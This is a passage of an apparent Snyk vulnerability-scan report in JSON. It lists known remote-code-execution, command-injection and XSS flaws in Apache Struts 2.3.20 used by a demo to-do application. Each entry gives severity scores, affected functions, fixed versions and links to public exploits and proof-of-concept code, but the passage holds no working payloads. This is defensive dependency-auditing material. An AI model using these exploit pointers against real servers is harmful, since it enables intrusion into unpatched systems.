"https://github.com/apache/struts/commit/b2bfdc5c88a13e82d647e7ae836089a12ce001fe", + "title": "GitHub Commit" + }, + { + "url": "https://securitylab.github.com/research/apache-struts-double-evaluation/", + "title": "GitHub Security Lab - Double Evaluation in Struts" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-062", + "title": "Struts Security Advisory" + }, + { + "url": "https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html", + "title": "Write Up & PoC" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-31805.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:49:12.874796Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:56.453682Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:12.874796Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). The fix issued for [CVE-2020-17530](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-1049003) was incomplete. Some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the `%{...} syntax`. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.30 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b2bfdc5c88a13e82d647e7ae836089a12ce001fe)\n- [GitHub Security Lab - Double Evaluation in Struts](https://securitylab.github.com/research/apache-struts-double-evaluation/)\n- [Struts Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-062)\n- [Write Up & PoC](https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-31805.yaml)\n", + "epssDetails": { + "percentile": "0.96232", + "probability": "0.18558", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-31805" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2022-04-12T20:32:06.687703Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-04-12T20:27:34Z", + "exploitDetails": { + "sources": [ + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2022-04-12T20:33:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:18.536966Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.30" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30060", + "title": "Manipulation of Struts' internals", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Viettel Information Security Center" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.3.24.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.24.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "http://struts.apache.org/docs/s2-026.html", + "title": "Vulnerability Summary" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:01.496065Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:56.364720Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:49:01.496065Z" + } + ], + "description": "## Overview\n`ValueStack` defines special `top` object which represents root of execution context. It can be used to manipulate Struts' internals or can be used to affect container's settings.\n\n## References\n- [http://struts.apache.org/docs/s2-026.html](http://struts.apache.org/docs/s2-026.html)\n", + "epssDetails": { + "percentile": "0.70008", + "probability": "0.00305", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-5209" + ], + "CWE": [ + "CWE-284" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-07-01T16:51:56Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2015-07-01T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:01.496065Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.24.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30207", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Nike Zheng" + ], + "semver": { + "vulnerable": [ + "[2.3.7, 2.3.32)", + "[2.5.0, 2.5.10.1)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.32", + "2.5.10.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 10, + "functions": [ + { + "version": [ + "[2.3.5, 2.3.32)" + ], + "functionId": { + "filePath": "org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java", + "className": "JakartaMultiPartRequest", + "functionName": "buildErrorMessage" + } + }, + { + "version": [ + "[2.5.0, 2.5.10.1)" + ], + "functionId": { + "filePath": "org/apache/struts2/interceptor/FileUploadInterceptor.java", + "className": "FileUploadInterceptor", + "functionName": "intercept" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638", + "title": "CVE Details" + }, + { + "url": "https://exploit-db.com/exploits/41614", + "title": "Exploit DB" + }, + { + "url": "https://www.exploit-db.com/exploits/41570/", + "title": "Exploit DB" + }, + { + "url": "https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/rapid7/metasploit-framework/issues/8064", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/rapid7/metasploit-framework/pull/8072", + "title": "GitHub PR" + }, + { + "url": "https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc", + "title": "PoC" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-045", + "title": "Struts Wiki" + }, + { + "url": "http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html", + "title": "Talos Intelligence Blog" + }, + { + "url": "https://www.exploit-db.com/exploits/41570", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-5638.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:47:26.418639Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:06:03.020507Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:26.418639Z" + } + ], + "description": "## Overview\r\n[`org.apache.struts:struts2-core`](https://cwiki.apache.org/confluence/display/WW/Home) is an elegant, extensible framework for building enterprise-ready Java web applications.\r\n\r\nAffected versions of the package are vulnerable to Arbitrary Command Execution while uploading files with the Jakarta Multipart parser. This particular vulnerability can be exploited by an attacker by sending a crafted request to upload a file to the vulnerable server that uses a Jakarta-based plugin to process the upload request.\r\n\r\nThe attacker can then send malicious code in the `Content-Type`, `Content-Disposition` or `Content-Length` HTTP headers, which will then be executed by the vulnerable server. [A proof of concept](https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc) that demonstrates the attack scenario is publicly available and the vulnerability is being [actively exploited in the wild](https://www.theregister.co.uk/2017/03/09/apache_under_attack_patch_for_zero_day_available/).\r\n\r\nAlthough maintainers of the open source project immediately patched the vulnerability, Struts servers that have yet to install the update remain under attack by hackers who exploit it to inject commands of their choice.\r\n\r\nThis attack can be achieved without authentication. To make matters worse, web applications don't necessarily need to successfully upload a malicious file to exploit this vulnerability, as just the presence of the vulnerable Struts library within an application is enough to exploit the vulnerability.\r\n\r\n## Remediation\r\nUpgrade `org.apache.struts:struts2-core` to version 2.3.32, 2.5.10.1 or higher.\n\n## References\n- [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638)\n- [https://exploit-db.com/exploits/41614](https://exploit-db.com/exploits/41614)\n- [https://www.exploit-db.com/exploits/41570/](https://www.exploit-db.com/exploits/41570/)\n- [https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7](https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7)\n- [https://github.com/rapid7/metasploit-framework/issues/8064](https://github.com/rapid7/metasploit-framework/issues/8064)\n- [https://github.com/rapid7/metasploit-framework/pull/8072](https://github.com/rapid7/metasploit-framework/pull/8072)\n- [https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc](https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc)\n- [https://cwiki.apache.org/confluence/display/WW/S2-045](https://cwiki.apache.org/confluence/display/WW/S2-045)\n- [http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html](http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html)\n", + "epssDetails": { + "percentile": "0.99996", + "probability": "0.97546", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-5638" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-j77q-2qqg-6989" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-03-19T10:28:21.873000Z", + "functions_new": [ + { + "version": [ + "[2.3.5, 2.3.32)" + ], + "functionId": { + "className": "org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest", + "functionName": "buildErrorMessage" + } + }, + { + "version": [ + "[2.5.0, 2.5.10.1)" + ], + "functionId": { + "className": "org.apache.struts2.interceptor.FileUploadInterceptor", + "functionName": "intercept" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-03-05T22:00:00Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-03-21T15:30:44Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.313495Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.32" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30770", + "title": "Command Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.3.20.2)", + "[2.3.24, 2.3.24.2)", + "[2.3.28, 2.3.28.1)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.20.2", + "2.3.24.2", + "2.3.28.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://exploit-db.com/exploits/39756", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081", + "title": "NVD" + }, + { + "url": "https://www.exploit-db.com/exploits/39756", + "title": "Exploit DB" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:46:47.334921Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:02.554699Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:47.334921Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Command Injection. When Dynamic Method Invocation was enabled, a remote attackers could execute arbitrary code via the prefix method, related to chained expressions.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/39756)\n- [GitHub Commit](https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081)\n- [Exploit DB](https://www.exploit-db.com/exploits/39756)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml)\n", + "epssDetails": { + "percentile": "0.99987", + "probability": "0.97524", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3081" + ], + "CWE": [ + "CWE-77" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.315000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-04-22T04:32:51Z", + "exploitDetails": { + "sources": [ + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-04-22T04:32:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:20.892839Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30771", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.20.2)", + "[2.3.24,2.3.24.2)", + "[2.3.28,2.3.28.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.20.2", + "2.3.24.2", + "2.3.28.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/6bd694b7980494c12d49ca1bf39f12aec3e03e2f", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3082", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:47.685356Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:39.390655Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:47.685356Z" + } + ], + "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22) is a free open-source solution for creating Java web applications.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. It allows remote attackers to execute arbitrary code via the stylesheet location parameter.\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3082)", + "epssDetails": { + "percentile": "0.99401", + "probability": "0.95903", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3082" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.327000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-04-22T02:36:52.273000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-04-22T02:36:52.273000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:47.685356Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30772", + "title": "Arbitrary Command Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.20.2)", + "[2.3.24,2.3.24.3)", + "[2.3.28,2.3.28.1)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.20.2", + "2.3.24.3", + "2.3.28.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://exploit-db.com/exploits/39919", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/6bd694b7980494c12d49ca1bf39f12aec3e03e2f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/98d2692e434fe7f4d445ade24fe2c9860de1c13f", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3087", + "title": "NVD" + }, + { + "url": "https://www.exploit-db.com/exploits/39919", + "title": "Exploit DB" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:49.896841Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:39.893991Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:49.896841Z" + } + ], + "description": "## Overview\r\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\r\nApache Struts 2.3.20.x before 2.3.20.3, 2.3.24.x before 2.3.24.3, and 2.3.28.x before 2.3.28.1, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via vectors related to an ! (exclamation mark) operator to the REST Plugin.\r\n\r\n## References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3087)", + "epssDetails": { + "percentile": "0.97435", + "probability": "0.46493", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3087" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.339000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-02T00:40:36Z", + "exploitDetails": { + "sources": [ + "ExploitDB", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-02T00:40:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:12.756827Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30773", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.3.28)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.28" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/5421930b49822606792f36653b17d3d95ef106f9", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/72471d7075681bea52046645ad7aa34e9c53751e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/a89bbe22cd2461748d595a89a254de888a415e6c", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4003", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:54.345030Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:27.272926Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:54.345030Z" + } + ], + "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\nCross-site Scripting (XSS) vulnerability in the URLDecoder function in JRE before 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single byte page encoding, allows remote attackers to inject arbitrary web script or HTML via multi-byte characters in a url-encoded parameter.\n\n## Details\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\r\n\r\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\r\n\r\nֿInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\r\n\r\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\r\n \r\nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \r\n\r\n### Types of attacks\r\nThere are a few methods by which XSS can be manipulated:\r\n\r\n|Type|Origin|Description|\r\n|--|--|--|\r\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\r\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code 